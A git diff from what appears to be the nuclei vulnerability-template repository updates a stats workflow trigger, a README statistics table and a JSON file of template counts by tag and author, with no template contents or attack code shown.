diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 669b665655..22f43e7261 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,6 +1,9 @@ name: đŸ—’ Templates Stats on: + create: + tags: + - v* workflow_dispatch: jobs: diff --git a/README.md b/README.md index 9ceb478e5d..30671a0e64 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 | -| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 | -| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 | -| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 | -| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | -| rce | 204 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 49 | | | | | +| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | +| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | +| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | +| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | +| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | -**171 directories, 2333 files**. +**175 directories, 2366 files**. diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 46b5586d34..4bed7d43d2 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":818},{"name":"lfi","count":330},{"name":"panel","count":259},{"name":"xss","count":256},{"name":"wordpress","count":245},{"name":"exposure","count":239},{"name":"rce","count":204},{"name":"tech","count":193},{"name":"wp-plugin","count":170},{"name":"cve2020","count":164},{"name":"cve2021","count":151},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":87},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"iot","count":68},{"name":"token","count":67},{"name":"default-login","count":66},{"name":"token-spray","count":63},{"name":"oob","count":59},{"name":"cve2017","count":50},{"name":"file","count":49},{"name":"unauth","count":47},{"name":"network","count":43},{"name":"sqli","count":40},{"name":"ssrf","count":40},{"name":"cve2016","count":37},{"name":"redirect","count":37},{"name":"","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":29},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"cve2015","count":26},{"name":"generic","count":24},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"auth-bypass","count":23},{"name":"cisco","count":22},{"name":"router","count":21},{"name":"misconfig","count":20},{"name":"aem","count":19},{"name":"debug","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"fuzz","count":14},{"name":"login","count":14},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"dns","count":13},{"name":"android","count":13},{"name":"devops","count":13},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"intrusive","count":10},{"name":"xxe","count":10},{"name":"vmware","count":9},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"backup","count":8},{"name":"airflow","count":8},{"name":"ibm","count":8},{"name":"cnvd","count":8},{"name":"nginx","count":8},{"name":"microsoft","count":8},{"name":"cve2008","count":8},{"name":"scada","count":8},{"name":"rails","count":8},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"cms","count":7},{"name":"kubernetes","count":7},{"name":"hp","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"jetty","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"fileupload","count":6},{"name":"citrix","count":6},{"name":"camera","count":6},{"name":"nodejs","count":6},{"name":"laravel","count":6},{"name":"lucee","count":6},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"deserialization","count":5},{"name":"phpmyadmin","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"drupal","count":5},{"name":"jolokia","count":5},{"name":"crlf","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"printer","count":5},{"name":"headless","count":5},{"name":"magmi","count":4},{"name":"exchange","count":4},{"name":"hongdian","count":4},{"name":"strapi","count":4},{"name":"asp","count":4},{"name":"amazon","count":4},{"name":"git","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"webserver","count":4},{"name":"symantec","count":4},{"name":"symfony","count":4},{"name":"rfi","count":4},{"name":"thinkphp","count":4},{"name":"firebase","count":4},{"name":"thinkcmf","count":4},{"name":"maps","count":4},{"name":"traversal","count":4},{"name":"slack","count":4},{"name":"buffalo","count":4},{"name":"grafana","count":4},{"name":"zabbix","count":4},{"name":"vpn","count":4},{"name":"samsung","count":4},{"name":"fatpipe","count":4},{"name":"glpi","count":4},{"name":"resin","count":4},{"name":"zimbra","count":4},{"name":"proxy","count":4},{"name":"wso2","count":4},{"name":"moodle","count":4},{"name":"npm","count":4},{"name":"elastic","count":4},{"name":"solarwinds","count":4},{"name":"cve2007","count":3},{"name":"vbulletin","count":3},{"name":"github","count":3},{"name":"bitrix","count":3},{"name":"kevinlab","count":3},{"name":"ofbiz","count":3},{"name":"lfr","count":3},{"name":"jellyfin","count":3},{"name":"r-seenet","count":3},{"name":"smtp","count":3},{"name":"hoteldruid","count":3},{"name":"openssh","count":3},{"name":"itop","count":3},{"name":"kibana","count":3},{"name":"microstrategy","count":3},{"name":"linkerd","count":3},{"name":"jeesns","count":3},{"name":"fanruan","count":3},{"name":"fpd","count":3},{"name":"nosqli","count":3},{"name":"druid","count":3},{"name":"ebs","count":3},{"name":"search","count":3},{"name":"node","count":3},{"name":"targa","count":3},{"name":"nacos","count":3},{"name":"zhiyuan","count":3},{"name":"httpd","count":3},{"name":"cacti","count":3},{"name":"telerik","count":3},{"name":"backdoor","count":3},{"name":"azure","count":3},{"name":"mongodb","count":3},{"name":"nexus","count":3},{"name":"log","count":3},{"name":"caucho","count":3},{"name":"openam","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"kafka","count":3},{"name":"oa","count":3},{"name":"tikiwiki","count":3},{"name":"injection","count":3},{"name":"ssh","count":3},{"name":"terramaster","count":3},{"name":"mail","count":3},{"name":"cves","count":3},{"name":"opensis","count":3},{"name":"springcloud","count":3},{"name":"grav","count":2},{"name":"activemq","count":2},{"name":"maian","count":2},{"name":"shellshock","count":2},{"name":"glassfish","count":2},{"name":"voipmonitor","count":2},{"name":"commax","count":2},{"name":"text","count":2},{"name":"netsweeper","count":2},{"name":"totemomail","count":2},{"name":"aviatrix","count":2},{"name":"kentico","count":2},{"name":"frp","count":2},{"name":"ilo","count":2},{"name":"leak","count":2},{"name":"chamilo","count":2},{"name":"plesk","count":2},{"name":"mailchimp","count":2},{"name":"tidb","count":2},{"name":"wuzhicms","count":2},{"name":"openfire","count":2},{"name":"nextjs","count":2},{"name":"bruteforce","count":2},{"name":"payara","count":2},{"name":"oauth","count":2},{"name":"bucket","count":2},{"name":"globalprotect","count":2},{"name":"embed","count":2},{"name":"vrealize","count":2},{"name":"service","count":2},{"name":"akkadian","count":2},{"name":"ecoa","count":2},{"name":"odoo","count":2},{"name":"wordfence","count":2},{"name":"couchdb","count":2},{"name":"bitly","count":2},{"name":"sonicwall","count":2},{"name":"heroku","count":2},{"name":"liferay","count":2},{"name":"flir","count":2},{"name":"sonarqube","count":2},{"name":"jsf","count":2},{"name":"chyrp","count":2},{"name":"minio","count":2},{"name":"ec2","count":2},{"name":"waf","count":2},{"name":"qihang","count":2},{"name":"harbor","count":2},{"name":"showdoc","count":2},{"name":"ecology","count":2},{"name":"natshell","count":2},{"name":"justwriting","count":2},{"name":"upload","count":2},{"name":"jboss","count":2},{"name":"prtg","count":2},{"name":"nagios","count":2},{"name":"icewarp","count":2},{"name":"webcam","count":2},{"name":"sitecore","count":2},{"name":"nextcloud","count":2},{"name":"akamai","count":2},{"name":"spark","count":2},{"name":"smb","count":2},{"name":"splunk","count":2},{"name":"geowebserver","count":2},{"name":"bypass","count":2},{"name":"saltstack","count":2},{"name":"hashicorp","count":2},{"name":"guacamole","count":2},{"name":"status","count":2},{"name":"netis","count":2},{"name":"kong","count":2},{"name":"qcubed","count":2},{"name":"prestashop","count":2},{"name":"enumeration","count":2},{"name":"linux","count":2},{"name":"idrac","count":2},{"name":"dolibarr","count":2},{"name":"aruba","count":2},{"name":"storage","count":2},{"name":"rockmongo","count":2},{"name":"yii","count":2},{"name":"hostheader-injection","count":2},{"name":"openvpn","count":2},{"name":"axis","count":2},{"name":"db","count":2},{"name":"seeyon","count":2},{"name":"ucmdb","count":2},{"name":"trixbox","count":2},{"name":"cache","count":2},{"name":"hjtcloud","count":2},{"name":"fortios","count":2},{"name":"xxljob","count":2},{"name":"horde","count":2},{"name":"jeedom","count":2},{"name":"backups","count":2},{"name":"avantfax","count":2},{"name":"vcenter","count":2},{"name":"axis2","count":2},{"name":"emerge","count":2},{"name":"cve2005","count":2},{"name":"hasura","count":2},{"name":"hpe","count":2},{"name":"paloalto","count":2},{"name":"pega","count":2},{"name":"huawei","count":2},{"name":"middleware","count":2},{"name":"mida","count":2},{"name":"mcafee","count":2},{"name":"phpcollab","count":2},{"name":"s3","count":2},{"name":"keycloak","count":2},{"name":"getsimple","count":2},{"name":"places","count":2},{"name":"chiyu","count":2},{"name":"igs","count":2},{"name":"rstudio","count":2},{"name":"yapi","count":2},{"name":"favicon","count":2},{"name":"dos","count":2},{"name":"sharepoint","count":2},{"name":"adminer","count":2},{"name":"timeclock","count":1},{"name":"rubedo","count":1},{"name":"mobileiron","count":1},{"name":"k8","count":1},{"name":"bullwark","count":1},{"name":"maxsite","count":1},{"name":"elascticsearch","count":1},{"name":"wavlink","count":1},{"name":"timezone","count":1},{"name":"k8s","count":1},{"name":"jaspersoft","count":1},{"name":"centos","count":1},{"name":"bigbluebutton","count":1},{"name":"directions","count":1},{"name":"streetview","count":1},{"name":"haproxy","count":1},{"name":"redmine","count":1},{"name":"htmli","count":1},{"name":"sprintful","count":1},{"name":"redhat","count":1},{"name":"tapestry","count":1},{"name":"influxdb","count":1},{"name":"nsasg","count":1},{"name":"finereport","count":1},{"name":"octoprint","count":1},{"name":"beanshell","count":1},{"name":"ulterius","count":1},{"name":"discord","count":1},{"name":"xml","count":1},{"name":"solman","count":1},{"name":"tileserver","count":1},{"name":"interlib","count":1},{"name":"sar2html","count":1},{"name":"sidekiq","count":1},{"name":"owasp","count":1},{"name":"dotnet","count":1},{"name":"zenario","count":1},{"name":"biometrics","count":1},{"name":"gitea","count":1},{"name":"linkedin","count":1},{"name":"tensorboard","count":1},{"name":"trane","count":1},{"name":"digitalocean","count":1},{"name":"daybyday","count":1},{"name":"embedthis","count":1},{"name":"landray","count":1},{"name":"eyou","count":1},{"name":"cse","count":1},{"name":"werkzeug","count":1},{"name":"setup","count":1},{"name":"sgp","count":1},{"name":"whm","count":1},{"name":"webadmin","count":1},{"name":"upnp","count":1},{"name":"avtech","count":1},{"name":"dbeaver","count":1},{"name":"arl","count":1},{"name":"visionhub","count":1},{"name":"esmtp","count":1},{"name":"tjws","count":1},{"name":"glowroot","count":1},{"name":"apiman","count":1},{"name":"elasticsearch","count":1},{"name":"javascript","count":1},{"name":"zarafa","count":1},{"name":"weather","count":1},{"name":"wifisky","count":1},{"name":"mediumish","count":1},{"name":"openx","count":1},{"name":"gateone","count":1},{"name":"pyramid","count":1},{"name":"shopizer","count":1},{"name":"couchbase","count":1},{"name":"portainer","count":1},{"name":"vidyo","count":1},{"name":"plone","count":1},{"name":"clockwork","count":1},{"name":"subrion","count":1},{"name":"openemr","count":1},{"name":"hiawatha","count":1},{"name":"phpshowtime","count":1},{"name":"acontent","count":1},{"name":"gridx","count":1},{"name":"alibaba","count":1},{"name":"openstack","count":1},{"name":"rujjie","count":1},{"name":"scs","count":1},{"name":"octobercms","count":1},{"name":"graphql","count":1},{"name":"ssltls","count":1},{"name":"saltapi","count":1},{"name":"szhe","count":1},{"name":"imap","count":1},{"name":"zookeeper","count":1},{"name":"myvuehelp","count":1},{"name":"episerver","count":1},{"name":"emc","count":1},{"name":"sendgrid","count":1},{"name":"ioncube","count":1},{"name":"okiko","count":1},{"name":"qsan","count":1},{"name":"logontracer","count":1},{"name":"duomicms","count":1},{"name":"expn","count":1},{"name":"roads","count":1},{"name":"pagerduty","count":1},{"name":"visualtools","count":1},{"name":"fuelcms","count":1},{"name":"memcached","count":1},{"name":"yzmcms","count":1},{"name":"gitlist","count":1},{"name":"zyxel","count":1},{"name":"lotus","count":1},{"name":"csod","count":1},{"name":"photo","count":1},{"name":"ipstack","count":1},{"name":"tika","count":1},{"name":"graphite","count":1},{"name":"apos","count":1},{"name":"tpshop","count":1},{"name":"gilacms","count":1},{"name":"webui","count":1},{"name":"ems","count":1},{"name":"bedita","count":1},{"name":"xampp","count":1},{"name":"sureline","count":1},{"name":"kyan","count":1},{"name":"comodo","count":1},{"name":"tor","count":1},{"name":"square","count":1},{"name":"karel","count":1},{"name":"redwood","count":1},{"name":"sqlite","count":1},{"name":"lutron","count":1},{"name":"nuuo","count":1},{"name":"sangfor","count":1},{"name":"spotify","count":1},{"name":"lanproxy","count":1},{"name":"jmx","count":1},{"name":"addpac","count":1},{"name":"flink","count":1},{"name":"ecom","count":1},{"name":"oscommerce","count":1},{"name":"geddy","count":1},{"name":"default","count":1},{"name":"blind","count":1},{"name":"lancom","count":1},{"name":"weiphp","count":1},{"name":"place","count":1},{"name":"checkpoint","count":1},{"name":"monitorix","count":1},{"name":"motorola","count":1},{"name":"jsp","count":1},{"name":"phpwiki","count":1},{"name":"dompdf","count":1},{"name":"labtech","count":1},{"name":"gsoap","count":1},{"name":"shiro","count":1},{"name":"playable","count":1},{"name":"rmc","count":1},{"name":"details","count":1},{"name":"panabit","count":1},{"name":"eyelock","count":1},{"name":"email","count":1},{"name":"tongda","count":1},{"name":"dom","count":1},{"name":"oneblog","count":1},{"name":"gotmls","count":1},{"name":"shopware","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"axiom","count":1},{"name":"springframework","count":1},{"name":"mirai","count":1},{"name":"concrete","count":1},{"name":"circle","count":1},{"name":"fedora","count":1},{"name":"vsphere","count":1},{"name":"ghost","count":1},{"name":"listserv","count":1},{"name":"chevereto","count":1},{"name":"gstorage","count":1},{"name":"mariadb","count":1},{"name":"realteo","count":1},{"name":"linksys","count":1},{"name":"newrelic","count":1},{"name":"mpsec","count":1},{"name":"tieline","count":1},{"name":"cloudflare","count":1},{"name":"idemia","count":1},{"name":"webmodule-ee","count":1},{"name":"sentry","count":1},{"name":"acme","count":1},{"name":"webftp","count":1},{"name":"phpunit","count":1},{"name":"clave","count":1},{"name":"twitter-server","count":1},{"name":"iptime","count":1},{"name":"phpfastcache","count":1},{"name":"dropbox","count":1},{"name":"zms","count":1},{"name":"nordex","count":1},{"name":"shoppable","count":1},{"name":"dvr","count":1},{"name":"jquery","count":1},{"name":"loqate","count":1},{"name":"moin","count":1},{"name":"contentkeeper","count":1},{"name":"shoretel","count":1},{"name":"azkaban","count":1},{"name":"st","count":1},{"name":"opentsdb","count":1},{"name":"livezilla","count":1},{"name":"cscart","count":1},{"name":"crm","count":1},{"name":"locations","count":1},{"name":"traefik","count":1},{"name":"pulsesecure","count":1},{"name":"ricoh","count":1},{"name":"rocketchat","count":1},{"name":"xdcms","count":1},{"name":"announcekit","count":1},{"name":"mantisbt","count":1},{"name":"jitsi","count":1},{"name":"sarg","count":1},{"name":"pivotaltracker","count":1},{"name":"youtube","count":1},{"name":"diris","count":1},{"name":"netgenie","count":1},{"name":"deviantart","count":1},{"name":"calendarix","count":1},{"name":"clockwatch","count":1},{"name":"floc","count":1},{"name":"find","count":1},{"name":"asana","count":1},{"name":"landrayoa","count":1},{"name":"geutebruck","count":1},{"name":"autocomplete","count":1},{"name":"ueditor","count":1},{"name":"rabbitmq","count":1},{"name":"tensorflow","count":1},{"name":"doh","count":1},{"name":"stem","count":1},{"name":"opensns","count":1},{"name":"nifi","count":1},{"name":"uwsgi","count":1},{"name":"auth","count":1},{"name":"geolocation","count":1},{"name":" default-login","count":1},{"name":"jnoj","count":1},{"name":"bookstack","count":1},{"name":"jfrog","count":1},{"name":"plc","count":1},{"name":"vscode","count":1},{"name":"csrfguard","count":1},{"name":"cyberoam","count":1},{"name":"nedi","count":1},{"name":"yealink","count":1},{"name":"centreon","count":1},{"name":"fortinet","count":1},{"name":"hiboss","count":1},{"name":"sourcebans","count":1},{"name":"secmail","count":1},{"name":"fortilogger","count":1},{"name":"feifeicms","count":1},{"name":"mongoshake","count":1},{"name":"smartsense","count":1},{"name":"robomongo","count":1},{"name":"tamronos","count":1},{"name":"achecker","count":1},{"name":"mantis","count":1},{"name":"elevation","count":1},{"name":"xiuno","count":1},{"name":"sceditor","count":1},{"name":"seacms","count":1},{"name":"ewebs","count":1},{"name":"spf","count":1},{"name":"electron","count":1},{"name":"yachtcontrol","count":1},{"name":"circontrorl","count":1},{"name":"pihole","count":1},{"name":"plastic","count":1},{"name":"fcm","count":1},{"name":"mrtg","count":1},{"name":"spring","count":1},{"name":"postmessage","count":1},{"name":"circleci","count":1},{"name":"node-red-dashboard","count":1},{"name":"ssl","count":1},{"name":"moinmoin","count":1},{"name":"krweb","count":1},{"name":"beanstalk","count":1},{"name":"sage","count":1},{"name":"nweb2fax","count":1},{"name":"artica","count":1},{"name":"wazuh","count":1},{"name":"metabase","count":1},{"name":"testrail","count":1},{"name":"iceflow","count":1},{"name":"varnish","count":1},{"name":"cors","count":1},{"name":"ambari","count":1},{"name":"pacsone","count":1},{"name":"javamelody","count":1},{"name":"jumpcloud","count":1},{"name":"keenetic","count":1},{"name":"stripe","count":1},{"name":"pgadmin","count":1},{"name":"phpfusion","count":1},{"name":"circontrol","count":1},{"name":"pippoint","count":1},{"name":"cobub","count":1},{"name":"burp","count":1},{"name":"lotuscms","count":1},{"name":"optiLink","count":1},{"name":"aspnuke","count":1},{"name":"pcoip","count":1},{"name":"gogs","count":1},{"name":"gloo","count":1},{"name":"ruby","count":1},{"name":"argussurveillance","count":1},{"name":"buildkite","count":1},{"name":"elfinder","count":1},{"name":"cerebro","count":1},{"name":"blue-ocean","count":1},{"name":"acexy","count":1},{"name":"wildfly","count":1},{"name":"flexbe","count":1},{"name":"gurock","count":1},{"name":"buttercms","count":1},{"name":"minimouse","count":1},{"name":"natemail","count":1},{"name":"dnssec","count":1},{"name":"weglot","count":1},{"name":"cockpit","count":1},{"name":"accela","count":1},{"name":"phalcon","count":1},{"name":"rockethchat","count":1},{"name":"camunda","count":1},{"name":"mysql","count":1},{"name":"exposures","count":1},{"name":"bingmaps","count":1},{"name":"trilithic","count":1},{"name":"maccmsv10","count":1},{"name":"faraday","count":1},{"name":"glances","count":1},{"name":"placeos","count":1},{"name":"mara","count":1},{"name":"dotnetnuke","count":1},{"name":"wondercms","count":1},{"name":"spip","count":1},{"name":"klog","count":1},{"name":"mdb","count":1},{"name":"redcap","count":1},{"name":"nc2","count":1},{"name":"magicflow","count":1},{"name":"eprints","count":1},{"name":"fortiweb","count":1},{"name":"majordomo2","count":1},{"name":"qdpm","count":1},{"name":"woocommerce","count":1},{"name":"gespage","count":1},{"name":"b2evolution","count":1},{"name":"tenda","count":1},{"name":"timesheet","count":1},{"name":"cherokee","count":1},{"name":"proftpd","count":1},{"name":"nette","count":1},{"name":"clink-office","count":1},{"name":"speed","count":1},{"name":"simplecrm","count":1},{"name":"cloudinary","count":1},{"name":"jenkin","count":1},{"name":"opencast","count":1},{"name":"servicedesk","count":1},{"name":"cloudron","count":1},{"name":"zzzcms","count":1},{"name":"aura","count":1},{"name":"viewpoint","count":1},{"name":"websvn","count":1},{"name":"terraform","count":1},{"name":"zm","count":1},{"name":"wiki","count":1},{"name":"raspap","count":1},{"name":"panos","count":1},{"name":"nerdgraph","count":1},{"name":"ntopng","count":1},{"name":"zend","count":1},{"name":"novnc","count":1},{"name":"kindeditor","count":1},{"name":"woocomernce","count":1},{"name":"ilo4","count":1},{"name":"lokalise","count":1},{"name":"chinaunicom","count":1},{"name":"clusterengine","count":1},{"name":"iterable","count":1},{"name":"bash","count":1},{"name":"meraki","count":1},{"name":"spectracom","count":1},{"name":"package","count":1},{"name":"avalanche","count":1},{"name":"swagger","count":1},{"name":"limit","count":1},{"name":"route","count":1},{"name":"codemeter","count":1},{"name":"luftguitar","count":1},{"name":"nexusdb","count":1},{"name":"scimono","count":1},{"name":"pendo","count":1},{"name":"bolt","count":1},{"name":"netrc","count":1},{"name":"opensmtpd","count":1},{"name":"perl","count":1},{"name":"tectuus","count":1},{"name":"fastapi","count":1},{"name":"travis","count":1},{"name":"etouch","count":1},{"name":"oidc","count":1},{"name":"cves2001","count":1},{"name":"wmt","count":1},{"name":"dotclear","count":1},{"name":"hubspot","count":1},{"name":"wakatime","count":1},{"name":"starttls","count":1},{"name":"kafdrop","count":1},{"name":"froxlor","count":1},{"name":"fortigates","count":1},{"name":"emby","count":1},{"name":"lansweeper","count":1},{"name":"ognl","count":1},{"name":"qvisdvr","count":1},{"name":"solarlog","count":1},{"name":"h3c-imc","count":1},{"name":"mongo","count":1},{"name":"thinkadmin","count":1},{"name":"netmask","count":1},{"name":"instagram","count":1},{"name":"discourse","count":1},{"name":"graph","count":1},{"name":"grails","count":1},{"name":"openweather","count":1},{"name":"netdata","count":1},{"name":"ruckus","count":1},{"name":"domxss","count":1},{"name":"processmaker","count":1},{"name":"matrix","count":1},{"name":"javafaces","count":1},{"name":"ns","count":1},{"name":"xvr","count":1},{"name":"pmb","count":1},{"name":"dvwa","count":1},{"name":"etherpad","count":1},{"name":"cofax","count":1},{"name":"exacqvision","count":1},{"name":"jeewms","count":1},{"name":"smi","count":1},{"name":"craftcms","count":1},{"name":"mautic","count":1},{"name":"svnserve","count":1},{"name":"miscrsoft","count":1},{"name":"lg-nas","count":1},{"name":"rmi","count":1},{"name":"resourcespace","count":1},{"name":"hadoop","count":1},{"name":"spidercontrol","count":1},{"name":"fiori","count":1},{"name":"openrestry","count":1},{"name":"sophos","count":1},{"name":"alertmanager","count":1},{"name":"razor","count":1},{"name":"darkstat","count":1},{"name":"sql","count":1},{"name":"cocoon","count":1},{"name":"cloud","count":1},{"name":"cgi","count":1},{"name":"commscope","count":1},{"name":"fortigate","count":1},{"name":"mapbox","count":1},{"name":"geocode","count":1},{"name":"distance","count":1},{"name":"anchorcms","count":1},{"name":"zte","count":1},{"name":"appweb","count":1},{"name":"cve2006","count":1},{"name":"database","count":1},{"name":"sonarcloud","count":1},{"name":"tcexam","count":1},{"name":"fastcgi","count":1},{"name":"bazarr","count":1},{"name":"skywalking","count":1},{"name":"nuxeo","count":1},{"name":"csrf","count":1},{"name":"frontpage","count":1},{"name":"xunchi","count":1},{"name":"codeigniter","count":1},{"name":"powercreator","count":1},{"name":"panasonic","count":1},{"name":"wamp","count":1},{"name":"twitter","count":1},{"name":"nps","count":1},{"name":"viewlinc","count":1},{"name":"opm","count":1},{"name":"erp-nc","count":1},{"name":"actuator","count":1},{"name":"key","count":1},{"name":"salesforce","count":1},{"name":"totaljs","count":1},{"name":"zmanda","count":1},{"name":"rhymix","count":1},{"name":"jenzabar","count":1},{"name":"omi","count":1},{"name":"asus","count":1},{"name":"metinfo","count":1},{"name":"empirecms","count":1},{"name":"remkon","count":1},{"name":"servicenow","count":1},{"name":"drone","count":1},{"name":"calendly","count":1},{"name":"shopxo","count":1},{"name":"rdp","count":1},{"name":"wooyun","count":1},{"name":"graylog","count":1},{"name":"goahead","count":1},{"name":"lighttpd","count":1},{"name":"soar","count":1},{"name":"tugboat","count":1},{"name":"gunicorn","count":1},{"name":"manager","count":1},{"name":"turbocrm","count":1},{"name":"blackboard","count":1},{"name":"myucms","count":1},{"name":"monitorr","count":1},{"name":"triconsole","count":1},{"name":"phpinfo","count":1},{"name":"mailgun","count":1},{"name":"hortonworks","count":1},{"name":"api-manager","count":1},{"name":"kubeflow","count":1},{"name":"xmlchart","count":1},{"name":"nimble","count":1},{"name":"vnc","count":1},{"name":"office365","count":1},{"name":"huijietong","count":1},{"name":"smartblog","count":1},{"name":"exponentcms","count":1},{"name":"webmin","count":1},{"name":"socomec","count":1},{"name":"svn","count":1},{"name":"vsftpd","count":1},{"name":"pagespeed","count":1},{"name":"synnefo","count":1},{"name":"expose","count":1},{"name":"nearby","count":1},{"name":"openerp","count":1},{"name":"rsyncd","count":1},{"name":"bing","count":1},{"name":"okta","count":1},{"name":"zeroshell","count":1},{"name":"wing-ftp","count":1},{"name":"websphere","count":1},{"name":"sco","count":1},{"name":"clickhouse","count":1},{"name":"visualstudio","count":1},{"name":"zcms","count":1},{"name":"kerbynet","count":1},{"name":"olivetti","count":1},{"name":"eg","count":1},{"name":"alerta","count":1},{"name":"expressjs","count":1},{"name":"primetek","count":1},{"name":"basic-auth","count":1},{"name":"plugin","count":1},{"name":"parentlink","count":1},{"name":"selea","count":1},{"name":"tracer","count":1},{"name":"nomad","count":1},{"name":"wavemaker","count":1},{"name":"messaging","count":1},{"name":"owa","count":1},{"name":"74cms","count":1},{"name":"postgres","count":1},{"name":"adb","count":1},{"name":"postmark","count":1},{"name":"redis","count":1},{"name":"tinypng","count":1}],"authors":[{"name":"daffainfo","count":285},{"name":"pikpikcu","count":279},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":201},{"name":"geeknik","count":159},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":64},{"name":"zzeitlin","count":63},{"name":"madrobot","count":63},{"name":"0x_akoko","count":46},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"wdahlenb","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"hackergautam","count":9},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"meme-lord","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"iamnoooob","count":5},{"name":"panch0r3d","count":5},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"johnk3r","count":5},{"name":"xelkomy","count":5},{"name":"lu4nx","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"ganofins","count":5},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"sullo","count":3},{"name":"f1tz","count":3},{"name":"mavericknerd","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"unstabl3","count":3},{"name":"fyoorer","count":3},{"name":"sushantkamble","count":3},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"shifacyclewala","count":3},{"name":"idealphase","count":3},{"name":"binaryfigments","count":3},{"name":"z3bd","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"0xelkomy","count":2},{"name":"swissky","count":2},{"name":"foulenzer","count":2},{"name":"johnjhacking","count":2},{"name":"sy3omda","count":2},{"name":"huowuzhao","count":2},{"name":"nkxxkn","count":2},{"name":"joeldeleep","count":2},{"name":"fabaff","count":2},{"name":"socketz","count":2},{"name":"0xprial","count":2},{"name":"ree4pwn","count":2},{"name":"0xrudra","count":2},{"name":"pxmme1337","count":2},{"name":"gevakun","count":2},{"name":"g4l1t0","count":2},{"name":"davidmckennirey","count":2},{"name":"arcc","count":2},{"name":"manas_harsh","count":2},{"name":"ha